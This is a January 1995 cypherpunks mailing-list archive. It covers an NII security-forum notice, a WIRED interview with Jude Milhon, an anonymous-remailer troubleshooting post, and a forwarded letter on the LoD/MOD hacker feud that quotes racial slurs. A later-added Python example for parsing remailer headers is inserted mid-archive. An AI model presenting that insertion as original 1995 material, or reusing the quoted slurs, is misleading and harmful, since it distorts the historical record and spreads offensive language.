they trust that information will go where and when they want it
and nowhere else," declared Sally Katzen, Administrator of the
Office of Information Regulatory Affairs at OMB and chair of the
Forum.  "The Federal government is a primary user of the NII and
thus a catalyst for change.  Yet the NII will be designed, built,
owned, operated, and used primarily by the private sector, making
it essential that security on the NII be considered in
partnership with the public."

     To address these critical issues, the Vice President formed
the Information Infrastructure Task Force (IITF).  The IITF is
chaired by Secretary of Commerce Ron Brown and is comprised of
senior Administration officials having expertise in technical,
legal, and policy areas pertinent to the NII.  The mission of the
IITF is to articulate and implement the Administration's vision
for the NII.  

     The NII Security Issues Forum was established within the
IITF to address the cross-cutting issue of security in the NII. 
The Forum is chaired by Sally Katzen, Administrator of the Office
of Information and Regulatory Affairs in the Office of Management
and Budget.  

     In addition to the IITF, the President has established the
U.S. Advisory Council on the National Information Infrastructure. 
The Advisory Council represents industry, labor, and public
interest groups, and advises the Secretary of Commerce on issues
relating to the NII.  Mega-Project III, one of three work groups
of the Advisory Council, is responsible for addressing security,
intellectual property, and privacy issues as they relate to the
NII.

B.   Structure and Content of Public Meeting

     Security is linked inextricably to broad public use of the
NII.  The technologies, policies, and procedures used to ensure
the confidentiality, availability, and integrity of digitally
produced and transmitted information, information products, and
services on the NII will determine whether, how, and to what
extent digitally linked information services will be broadly used
in such critical applications as providing public information,
supporting the delivery of government services, utilizing
intelligent transportation systems, and conducting trade. 

     Development of policies and procedures that will ensure the
security of public and private information and communications on
the NII requires study from different perspectives, whether that
of the subject of the information, the user of the information,
or the creator of the information.  The Forum and Mega-Project
III seek input from parties representing beneficiaries of federal
information and services and users of intelligent transportation
systems and trade data.

     Solutions to these concerns will come via technical
solutions, as well as legal and policy mechanisms.  The Forum and
Mega-Project III seek input in this area as well.  Specifically,
what legal measures, policy mechanisms, and technological
solutions, or combinations thereof, can be used to effectively
protect the security of federal benefits information or
transportation or trade data, delivered or made accessible on the
NII?  

     A panel of witnesses drawn from the public will be assembled
to discuss the following topics with a panel of senior
Administration officials, members of the Security Issues Forum,
members of the Advisory Council, and policy makers at the State
level, and to field questions and comments from other members of
the public.  

     Position statements for the meeting, "Security in the
Delivery of Electronic Information and Services," should address
four principal questions:  

1.   How do you envision the NII being used to provide services
     and information electronically to citizens?  Specifically,
     what types of services and information should be delivered
     or made available?

2.   What risks and threats do you foresee in making services and
     information available via the NII?  Such threats might
     include fraud, unauthorized access, breach of
     confidentiality or privacy, breach of integrity, and system
     performance.

3.   What legal, policy, and ethical issues do you foresee
     affecting usage of the NII?  Such issues may include
     liability, information/property rights, access,
     document/records management, legal admissibility/evidentiary
     requirements, and auditability.  Do some issues, such as
     privacy and open access, tend to countervene each other?

4.   What kinds of administrative or technical solutions should
     be developed or promoted to address security, legal, and
     ethical concerns?  Such solutions may include verifying
     recipient and/or vendor eligibility, ensuring operational
     and systems security, and establishing means to facilitate
     settlement, detection, and prosecution.

     Position statements for the meeting, "Security for
Intelligent Transportation Systems and Trade Information," should
address five principal questions:

1.   Who should be permitted access to sensitive trade and
     transportation information systems?  How can inappropriate
     access and use be prevented?

2.   What technical and institutional safeguards in electronic
     data transmission, storage, and retrieval are needed to
     protect the security of trade and transportation data?  Such
     risks might include:  disclosure of proprietary and
     confidential business information, criminal access to trade
     and cargo records, disclosure of individual travel patterns
     or vehicle locations, or disclosure of transportation
     dispatch communications regarding sensitive cargo shipment
     routes, itineraries, and locations.

3.   What does an "appropriate level of security" consist of?  Is
     there a "one-size-fits-all" solution, or can policies be
     established which flexibly meet diverse needs?

4.   Do certain systems merit greater degrees of security
     protection, such as traffic signal control systems, variable
     message signs, fleet location monitoring, electronic toll
     collection, international trade data, and motor vehicle
     registration records?

5.   Who should establish and enforce security policies?  How can
     government and the private sector work together to support a
     secure National Information Infrastructure?

II.  Guidelines for Participation in the Public Hearing

     Individuals who would like to participate on a panel must
request an opportunity to do so no later than January 20, 1995,
by submitting a brief, 1 - 2 page summary position statement.  If
approved, each participant will be allowed to present brief
opening remarks.  Primary participation, however, shall be during
the general discussion to follow, according to the format
described above.  

     Participants in the public meeting will testify before and
participate in discussions with a panel consisting of members of
the Advisory Council, members of the Security Issues Forum, and
other Administration officials.  

     Individuals not selected as panel participants may offer
comments or ask questions of the witnesses by requesting an
opportunity to do so and being recognized during the meeting by
the chairs of the meetings.  Oral remarks offered in this fashion
should not exceed three minutes.  No advance approval is required
to attend the public meetings, offer comments, or present
questions.

     The public meeting on "Security of the Electronic Delivery
of Information and Services" will be chaired by Mr. Jim Flyzik,
Chair of the Government Information Technology Services Working
Group of the IITF. 

     The public meeting on "Security for Intelligent
Transportation Systems and Trade Information," will be co-chaired
by Ms. Ana Sol Gutierrez, Deputy Administrator of the Research
and Special Programs Administration of the U.S. Department of
Transportation, and Ms. Christine Johnson, Director of the
Intelligent Transportation Systems Joint Program Office of the
U.S. Department of Transportation. 

     More information about the Clinton Administration's National
Information Infrastructure initiative can be obtained from the
IITF Secretariat.  Inquiries may be directed to Yvette Barrett at
(202) 482-1835, by e-mail to ybarrett@ntia.doc.gov, or by mail to
U.S. Department of Commerce, IITF Secretariat, NTIA, Room 4892,
Washington, D.C., 20230.  

     For inquiries over the Internet to the IITF Gopher Server,
gopher, telnet (login = gopher), or anonymous ftp to
iitf.doc.gov.  Access is also available over the World-Wide-Web. 
Questions may be addressed to nii@ntia.doc.gov.  

     For access by modem, dial (202) 501-1920 and set modem
communication parameters at no parity, 8 data bits, and one stop
(N,8,1).  Modem speeds of up to 14,400 baud are supported.  

Sally Katzen
Administrator, Office of Information and Regulatory Affairs
Certified to be a true copy of the original by John B. Arthur,
Associate Director for Administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 15 Jan 95 16:38:24 PST
To: cypherpunks@toad.com
Subject: Jude Milhon in WIRED
Message-ID: <gate.J1PZyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
member of the cypherpunks - a term that she coined." I didn't even know there
_was_ a charter. The interview as such is mainly about why "girls _need_
modems."



-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sun, 15 Jan 95 16:50:09 PST
To: ianf@sydney.sgi.com (Ian Farquhar)
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <9501161049.ZM27032@wiley.sydney.sgi.com>
Message-ID: <199501160027.SAA00332@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Ditto.
> 
> > In many countries (and even China is on the Net these days), writings
> > critical of the government, such as exposure of human rights abuses,
> > are illegal. The authors face imprisonment, torture and death. By
> > posting anonymously to the Net, the information can be brought safely
> > to the attention of the world.
> 
> Perhaps mention the Russian coup, where the net became a conduit for
> information leaving Moscow.  I remember a colleague of mine announcing
> incidents which had occurred within Moscow hours before the news services
> broadcast them, simply by getting emails from a colleague nearby,
> 
>
It was even possible to get eyewitness descriptions of much of the troop
movement in Moscow in near real-time on #russia. The attack on the Russian
White House was in particular quite interesting to watch on CNN and compare
what was going on via irc comments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 15 Jan 95 20:30:18 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <199501160356.TAA09359@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger wrote:

> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know there
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...

I'm not sure what Perry's not having heard of Jude Milhon is supposed
to mean, or how "Wired" interviewing her is "another example of the
continuing decay," etc.

In any case, Jude Milhon has been active in the hacker-writer
community, going back to the 1970s. Steven Levy's "Hackers" has
several pages on her role in various things happening in the Lee
Felsenstein circle of folks (there may be some of you who have no idea
who Lee is....I can only hope that when you find interviews with him
you not assume decay is occurring). More recently she was an editor at
"Mondo 2000" and has had various connections to Cypherpunks.

Jude was indeed the coiner of the "cypherpunk" term, and was at most of
the early meetings, for at least the first year. (My FAQ will have
more information on how Jude came to think of the name and whatnot.)

She's not presently subscribed and hence can't speak up in this
strange matter of how an interview with her implies a magazine is in
decay.

(I'm hoping this is not what Perry really meant, but I can't see any
other interpretations based on what I quoted above.)

I just don't think Jude deserves this kind of casual trashing. 

While I haven't been reading "Mondo" regularly for a couple of years,
and while I'm getting bored with "Wired," this doesn't mean that
people being interviewed deserve trashing. (Indeed, the "bleeding
edge" trendiness of "Wired," say, means that nearly anything once
"wired" is fated to be marked as "tired" by the "stimulate me!"
Starbucks crowd of techno-yuppies. Unlike a more staid journal, like
"Nature" or "The Economist," as examples, trendy techno-style mags
like "Wired," "Spin," "boing boing," "Future Sex," and a hundred other
wirehead variants of "Vogue" and "People" will appeal precisely to the
style mavens who so fickly announce what is trendy and what is not.)

Anyone who professes to be "disappointed" by "Wired" was clearly taken
in by their hype.

(For what it's worth, I still enjoy flipping through the pages, often
finding one or two items that spark my thinking. No, much of it is
junk. So what else is new?)

Oh, and on Rishab's original point about "charter members," I took
this in the usual figurative sense. A charter member of the
Cypherpunks is basically just a card-carrying member. (Hint: Find your
own cards.)

--Tim



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A.J. Janschewitz" <aj@pcnet.com>
Date: Sun, 15 Jan 95 17:00:00 PST
To: rishab@dxm.ernet.in
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <gate.J1PZyc1w165w@dxm.ernet.in>
Message-ID: <Pine.3.88.9501151917.A8096-0100000@pcnet1.pcnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995 rishab@dxm.ernet.in wrote:

> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter. The interview as such is mainly about why "girls _need_
> modems."

WiReD. What a waste of pulp; worse, what a waste of potential. A magazine 
that could have held the hands of aol novices and led them into the real 
net.world, and promoted freenets, and demonstrated the need for 
cryptosystems, and challenged the minds of net citizens decided to take 
the low road and become "USA Today" (for cypherpunks abroad, "USA-T" is a 
`newspaper' that looks like a big comic book, and doesn't trouble its 
readers with many syllables ... rather like Prodigy ...).

==a.j.==

--
  "The large print giveth and the small print taketh away." - Tom Waits





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 15 Jan 95 17:19:37 PST
To: rishab@dxm.ernet.in
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <gate.J1PZyc1w165w@dxm.ernet.in>
Message-ID: <9501160118.AA05350@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



rishab@dxm.ernet.in says:
> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter.

Or a Jude Milhon, for that matter. Another example of the continuing
decay of a once proud magazine...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 17:45:38 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501160137.AA17721@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


>>             newsgroups.  Mandating encryption renders this mode useless.
>>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
At 02:42 AM 1/15/95 -0600, Larry E wrote:
>Here, I don't understand your point.  If you mean an encrypted
>message to a remailer cannot result in a plaintext usenet posting,
>that of course is not true.  The remailers have PGP keys of their
>own, just as any private user may.  In addition, some of the
>remailers support direct usenet posting.  Thus, a message may be
>encrypted to the remailer and posted as plaintext as the remailer
>decrypts the message.

I wasn't referring to requiring encryption using the remailer's public key.  
I was referring to the stuff discussed here, where the remailer operator 
insists on ensuring that the traffic is encrypted over and beyond the 
remailer's public key, in order to give the operator plausible deniability.

Really, all inbound remailer traffic should be encrypted with the remailer's 
public key if any significant level of security is desired.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@metronet.com (David K. Merriman)
Date: Sun, 15 Jan 95 18:44:58 PST
To: cypherpunks@toad.com
Subject: hiatus
Message-ID: <199501160245.AA09108@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a short note to let folks know that I'll be unsubscribing for a while
(probably a couple of months) while I get ready and then move to Amarillo to
set up an ISP :-)

The staging phase is taking up a large portion of my time, and I really
don't have the slack to do more than give the subject lines in the CP list a
cursory glance these days - just enough to see what the current flame war is
about :-)

Once I get the ISP set up, I'll be putting an anon remailer on it; I may
also offer "Remailer-in-a-box" accounts for some relatively minor fee (if
motivated, I may even take digicash as payment :-). I don't expect any
problems about setting up accounts, since I'll be the MIS Manager, VP
Engineering, etc, etc. Too, since the service will be commercial, I expect
that I'll be able to do a pretty fair job of ignoring complaints of the kind
that get .edu and on-the-left remailers shut down.

I'll still be able to receive email at this account at least until the end
of February; once I get set up in Amarillo, I'll resub and let everyone know
where I am (just in case anyone cares :-)

FYI, the tentative name for the ISP is panhandle.net.....

Dave Merriman
- - - - - - - - - - - - - - - - - - - - - - - - - - 
Finger merriman@fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution 
inevitable."  John F. Kennedy 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 18:03:44 PST
To: cypherpunks@toad.com
Subject: interesting problem with remailers
Message-ID: <199501160203.VAA07586@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


I need a good dependable cypherpunk style anonymous remailer. So I have been 
experimenting with a few.
I have discovered a rather curious problem. I have sent test messages to 
homer@rahul.net. These test messages read as follows:

::
Request-Remailing-To: myname@mydonain
Subject: Test

this is line1
this is line2
this is line3
this is line4
this is line5
this is line6

I have encrypted this message with the public key of homer@rahul.net using the 
pgp -ea command (for armour). This yields something like:

-----BEGIN PGP MESSAGE----
version 2.6.2

blahblahblah
blah blah
blah blah etc.....
------END PGP MESSAGE---

I have then put
::
Encrypted: PGP
<blank line>
 
at the beginning of the message and send it with Eudora PC 1.4.
Now curiously enough the message that I received back from homer@rahul is the 
following:

*************************************************************
To: myname@mysite
From: nobody@rahul.net
Subject: Test
Remailed-By: A Free Zone Remailer V1.2 <homer@rahul.net>
Complaints-To: Homer Wilson Smith <homer@rahul.net>
X-Comments: 
X-Comments:       finger homer@rahul.net for instructions.
X-Comments: 
X-Comments: Unauthorized or illegal use of this remailer, especially
X-Comments: for spamming the internet or posting copyright violations
X-Comments: will be prosecuted to the fullest extent of the law.
X-Comments: Homer Wilson Smith  (607) 277-0959, Fax: (607) 277-8913
X-Comments:                FULL HEADER LOGGING IS: ON

This is line1
this is line3
this is line5
*************************************************************

No this is line2
no this is line4
no this is line6

I am unable to explain this. Obviously the message must be received intact by 
the remailer because being encrypted with PGP if it were corrupt in any way it 
would simply not decode properly and I would get no reply whatsoever. Now 
before somebody says that the trouble is at my site, I also have an account on
CI$ (compuserve). The same thing happens to messages I received there. So 
obviously it cannot be my site. Unless I am doing something that somehow tells 
the remailer to only remail one line out of two. (?????)
And this problem is not only with homer@rahul. Other remailers do the same.
I know that it must be something that I am doing but it escapes me what. Again 
it must receive the PGP message correctly. I am stumped....
If anybody can help explain this little mystery, it would be most appreciated.

Please reply here at cypherpunks@toad.com and also forward to
wizard@alpha.c2.org (to see if it works)

Thanks all
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----
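
The message layout described in the post above, and the line-loss check the poster did by eye, as an added example that is not part of the original message or of any remailer's code. The parser follows only the "::" layout shown in the post; the address, the armour placeholder and all function names are constructed for illustration.

```python
import re

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")


def parse_pasted_headers(text):
    """Split a message body into its '::' header block and the rest.

    Returns (headers, body_lines). headers is empty when the body does not
    start with a '::' line. CRLF and LF line endings are both accepted.
    """
    lines = text.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    i = 0
    while i < len(lines) and lines[i].strip() == "":
        i += 1                      # skip blank lines before the marker
    headers = {}
    if i < len(lines) and lines[i].strip() == "::":
        i += 1
        while i < len(lines) and lines[i].strip() != "":
            m = HEADER_RE.match(lines[i].strip())
            if m is None:
                raise ValueError("malformed header line: %r" % lines[i])
            headers[m.group(1).lower()] = m.group(2).strip()
            i += 1
        i += 1                      # skip the blank separator line
    body = lines[i:]
    while body and body[-1].strip() == "":
        body.pop()                  # ignore trailing blank lines
    return headers, body


def missing_lines(sent, received):
    """1-based positions of sent lines that do not appear, in order, in
    received. Assumes the relay only drops lines (it adds or reorders none)."""
    missing, j = [], 0
    for pos, line in enumerate(sent, start=1):
        if j < len(received) and received[j].strip().lower() == line.strip().lower():
            j += 1
        else:
            missing.append(pos)
    return missing


def describe_loss(missing, total):
    """Name the loss pattern so separate test runs can be compared."""
    if not missing:
        return "intact"
    if missing == list(range(2, total + 1, 2)):
        return "every second line dropped"
    if missing == list(range(missing[0], total + 1)):
        return "truncated after line %d" % (missing[0] - 1)
    return "irregular loss"


# Constructed sample modelled on the post: the inner request as typed on a
# PC (CRLF line endings), and the outer wrapper around the armoured text.
INNER_REQUEST = (
    "::\r\n"
    "Request-Remailing-To: myname@example.invalid\r\n"
    "Subject: Test\r\n"
    "\r\n"
    + "".join("this is line%d\r\n" % n for n in range(1, 7))
)
OUTER_WRAPPER = (
    "::\n"
    "Encrypted: PGP\n"
    "\n"
    "-----BEGIN PGP MESSAGE-----\n"
    "(constructed placeholder, not real ciphertext)\n"
    "-----END PGP MESSAGE-----\n"
)
# Body of the reply as reported in the post (constructed from its text).
RECEIVED_BODY = ["This is line1", "this is line3", "this is line5"]


def check_round_trip(request_text, received_body):
    """Compare the body that was sent with the body that came back."""
    _, sent_body = parse_pasted_headers(request_text)
    missing = missing_lines(sent_body, received_body)
    return missing, describe_loss(missing, len(sent_body))


if __name__ == "__main__":
    print(parse_pasted_headers(OUTER_WRAPPER)[0])
    print(parse_pasted_headers(INNER_REQUEST)[0])
    print(check_round_trip(INNER_REQUEST, RECEIVED_BODY))
```

Running the same check against an unencrypted request separates a fault in the remailer's body handling from a fault in the encryption step.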





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sun, 15 Jan 95 20:45:28 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <m0rTjIC-0004J0C@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Jude was indeed the coiner of the "cypherpunk" term, and was at most of
> the early meetings, for at least the first year. (My FAQ will have
> more information on how Jude came to think of the name and whatnot.)

I, for one, would like to see this - I've only been on the list for a bit
over two years, and I'd never heard of Jude, either.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **
"How many beers have you had tonight, bro?"  "Seventy."  -- "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 15 Jan 95 21:57:17 PST
To: ecarp@netcom.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <m0rTjIC-0004J0C@s116.slcslip.indirect.com>
Message-ID: <199501160556.VAA05701@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp [khijol Sysadmin] wrote:
> 
> > Jude was indeed the coiner of the "cypherpunk" term, and was at most of
> > the early meetings, for at least the first year. (My FAQ will have
> > more information on how Jude came to think of the name and whatnot.)
> 
> I, for one, would like to see this - I've only been on the list for a bit
> over two years, and I'd never heard of Jude, either.

It's in the Cyphernomicon FAQ...just grep for it.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Sun, 15 Jan 95 18:58:12 PST
To: cypherpunks@toad.com
Subject: ... and speaking of WiReD...
Message-ID: <9501160258.AA09372@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



Given the recent discussion on WireD, I thought some of you
might enjoy this editorial (read: rant) authored by Erik Bloodaxe.

Enjoy.

- paul



Forwarded message:

> Date:         Sun, 15 Jan 1995 20:34:00 CST
> Reply-To: TK0JUT2@MVS.CSO.NIU.EDU
> Sender: CU-DIGEST list <CUDIGEST@UIUCVMD.BITNET>
> From: "Cu Digest (tk0jut2@mvs.cso.niu.edu)" <TK0JUT2@MVS.CSO.NIU.EDU>
> Subject:      Cu Digest, #7.03
> To: Multiple recipients of list CUDIGEST <CUDIGEST@UIUCVMD.BITNET>
> 
> Computer underground Digest    Sun  Jan 15, 1995   Volume 7 : Issue 03
>                            ISSN  1004-042X
> 
>        Editors: Jim Thomas and Gordon Meyer (TK0JUT2@NIU.BITNET)
>        Archivist: Brendan Kehoe
>        Retiring Shadow Archivist: Stanton McCandlish
>        Shadow-Archivists: Dan Carosone / Paul Southworth
>                           Ralph Sims / Jyrki Kuoppala
>                           Ian Dickinson
>        Copy Reader:       Laslo Toth
> 
> CONTENTS, #7.03 (Sun, Jan 15, 1995)
> 
> File 1--Open Letter to Wired Magazine (fwd)
> File 2--More Legal Analysis of Steve Jackson Games (Legal Bytes)
> File 3--The Stupid Net.Coverage News Awards -- 1994 and 1995
> File 4--Alliance for Community Media -- Call for Workshops
> File 5--Cu Digest Header Info (unchanged since 25 Nov 1994)
> 
> CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN
> THE CONCLUDING FILE AT THE END OF EACH ISSUE.
> 
> ----------------------------------------------------------------------
> 
> Date: Sat, 14 Jan 1995 20:08:38 -0600 (CST)
> From: David Smith <bladex@BGA.COM>
> Subject: File 1--Open Letter to Wired Magazine (fwd)
> 
>                ---------- Forwarded message ----------
> 
> >From--phrack@well.sf.ca.us (Chris Goggans)
> >Subject--Open Letter to Wired Magazine
> >Date--13 Jan 1995 00:51:09 GMT
> 
> To Whom It May Concern:
> 
> I am writing this under the assumption that the editorial staff at
> Wired will "forget" to print it in the upcoming issue, so I am also
> posting it on every relevant newsgroup and online discussion forum
> that I can think of.
> 
> When I first read your piece "Gang War In Cyberspace" I nearly choked
> on my own stomach bile.  The whole tone of this piece was so far
> removed from reality that I found myself questioning what color the
> sky must be in Wired's universe.  Not that I've come to expect any
> better from Wired.  Your magazine, which could have had the potential
> to actually do something, has become a parody...a politically correct
> art-school project that consistently falls short of telling the whole
> story or making a solid point.  (Just another example of Kapor-Kash
> that ends up letting everyone down.)
> 
> I did however expect more from Josh Quittner.
> 
> I find it interesting that so much emphasis can be placed on an issue
> of supposed racial slurs as the focus of an imaginary "gang war,"
> especially so many years after the fact.
> 
> It's also interesting to me that people keep overlooking the fact that
> one of the first few members of our own little Legion of Doom was
> black (Paul Muad'dib.)  Maybe if he had not died a few years back that
> wouldn't be so quickly forgotten.  (Not that it makes a BIT of
> difference what color a hacker is as long as he or she has a brain and
> a modem, or these days at least a modem.)
> 
> I also find it interesting that a magazine can so easily implicate
> someone as the originator of the so-called "fighting words" that
> allegedly sparked this online-battle, without even giving a second
> thought as to the damage that this may do to the person so named.  One
> would think that a magazine would have more journalistic integrity
> than that (but then again, this IS Wired, and political correctness
> sells magazines and satisfies advertisers.) Thankfully, I'll only have
> to endure one month of the "Gee Chris, did you know you were a racist
> redneck?" phone calls.
> 
> It's further odd that someone characterized as so sensitive to insults
> allegedly uttered on a party-line could have kept the company he did.
> Strangely enough, Quittner left out all mention of the MOD member who
> called himself "SuperNigger."  Surely, John Lee must have taken
> umbrage to an upper-middle class man of Hebrew descent so shamefully
> mocking him and his entire race, wouldn't he?   Certainly he wouldn't
> associate in any way with someone like that...especially be in the
> same group with, hang out with, and work on hacking projects with,
> would he?
> 
> Please, of course he would, and he did.  (And perhaps he still
> does...)
> 
> The whole "racial issue" was a NON-ISSUE.  However, such things make
> exciting copy and garner many column inches so keep being rehashed.
> In fact, several years back when the issue first came up, the
> statement was cited as being either "Hang up, you nigger," or "Hey,
> SuperNigger," but no one was sure which was actually said.  Funny how
> the wording changes to fit the slant of the "journalist" over time,
> isn't it?
> 
> I wish I could say for certain which was actually spoken, but alas, I
> was not privy to such things.  Despite the hobby I supposedly so
> enjoyed according to Quittner, "doing conference bridges," I abhorred
> the things.  We used to refer to them as "Multi-Loser Youps"
> (multi-user loops) and called their denizens "Bridge Bunnies."  The
> bridge referred to in the story was popularized by the callers of the
> 5A BBS in Houston, Texas.  (A bulletin board, that I never even got
> the chance to call, as I had recently been raided by the Secret
> Service and had no computer.)  Many people from Texas did call the
> BBS, however, and subsequently used the bridge, but so did people from
> Florida, Arizona, Michigan, New York and Louisiana.  And as numbers do
> in the underground, word of a new place to hang out caused it to
> propagate rapidly.
> 
> To make any implications that such things were strictly a New York
> versus Texas issue is ludicrous, and again simply goes to show that a
> "journalist" was looking for more points to add to his (or her)
> particular angle.
> 
> This is not to say that I did not have problems with any of the people
> who were in MOD.  At the time I still harbored strong feelings towards
> Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
> And that was YEARS ago.  (Even I don't harbor a grudge that long.)
> Even the dozen or so annoying phone calls I received in late 1990 and
> early 1991 did little to evoke "a declaration of war."  Like many
> people, I know how to forward my calls, or unplug the phone.  Amazing
> how technology works, isn't it?
> 
> Those prank calls also had about as much to do with the formation of
> Comsec as bubble-gum had to do with the discovery of nuclear fission.
> (I'm sure if you really put some brain power to it, and consulted
> Robert Anton Wilson, you could find some relationships.)  At the risk
> of sounding glib, we could have cared less about hackers at Comsec.
> If there were no hackers, or computer criminals, there would be no
> need for computer security consultants.  Besides, hackers account for
> so little in the real picture of computer crime, that their existence
> is more annoyance than something to actually fear.
> 
> However, when those same hackers crossed the line and began tapping
> our phone lines, we were more than glad to go after them.  This is one
> of my only rules of action:  do whatever you want to anyone else, but
> mess with me and my livelihood and I will devote every ounce of my
> being to paying you back.  That is exactly what we did.
> 
> This is not to say that we were the only people from the computer
> underground who went to various law enforcement agencies with
> information about MOD and their antics.  In fact, the number of
> hackers who did was staggering, especially when you consider the usual
> anarchy of the underground.  None of these other people ever get
> mentioned and those of us at Comsec always take the lead role as the
> "narks," but we were far from alone.  MOD managed to alienate the vast
> majority of the computer underground, and people reacted.
> 
> All in all, both in this piece, and in the book itself, "MOD, The Gang
> That Ruled Cyberspace," Quittner has managed to paint a far too
> apologetic piece about a group of people who cared so very little
> about the networks they played in and the people who live there.  In
> the last 15 years that I've been skulking around online, people in the
> community have always tended to treat each other and the computer
> systems they voyeured with a great deal of care and respect.  MOD was
> one of the first true examples of a groupthink exercise in hacker
> sociopathy.  Selling long distance codes, selling credit card numbers,
> destroying systems and harassing innocent people is not acceptable
> behavior among ANY group, even the computer underground.
> 
> There have always been ego flares and group rivalries in the
> underground, and there always will be.  The Legion of Doom itself was
> FOUNDED because of a spat between its founder (Lex Luthor) and members
> of a group called The Knights of Shadow.  These rivalries keep things
> interesting, and keep the community moving forward, always seeking the
> newest bit of information in a series of healthy one-upsmanship.  MOD
> was different.  They took things too far against everyone, not just
> against two people in Texas.
> 
> I certainly don't condemn everyone in the group.  I don't even know a
> number of them (electronically or otherwise.)  I honestly believe that
> Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed
> while the group's two biggest criminals, Julio Fernandez (Outlaw) and
> Allen Wilson (Wing), rolled over on everyone else and walked away free
